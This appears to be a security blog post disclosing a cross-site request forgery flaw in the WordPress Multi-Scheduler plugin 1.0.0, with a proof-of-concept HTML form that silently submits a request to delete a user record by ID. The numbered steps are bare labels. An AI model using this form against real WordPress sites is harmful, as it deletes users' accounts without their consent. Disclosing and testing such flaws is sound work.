The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
Step -1
Step -2
Step -3
Step -4
<form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">
<input type="hidden" name="pro_delete_id" value="1" />
<input type="hidden" name="professional_delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
Step -5
Step -6
BOOM 🙂 !! User will be deleted.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
The security of your API should be one of the top priorities of companies. Without…
Hey Folks, In today's business world, it is essential to have an online presence. However,…
Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…
This website uses cookies.
View Comments
I'm amazed, I must say. Rarely do I come across a blog that's both educative and amusing, and without
a doubt, you have hit the nail on the head. The issue is something
which too few people are speaking intelligently about.
I'm very happy that I found this during my hunt for something regarding this.
thanks a lot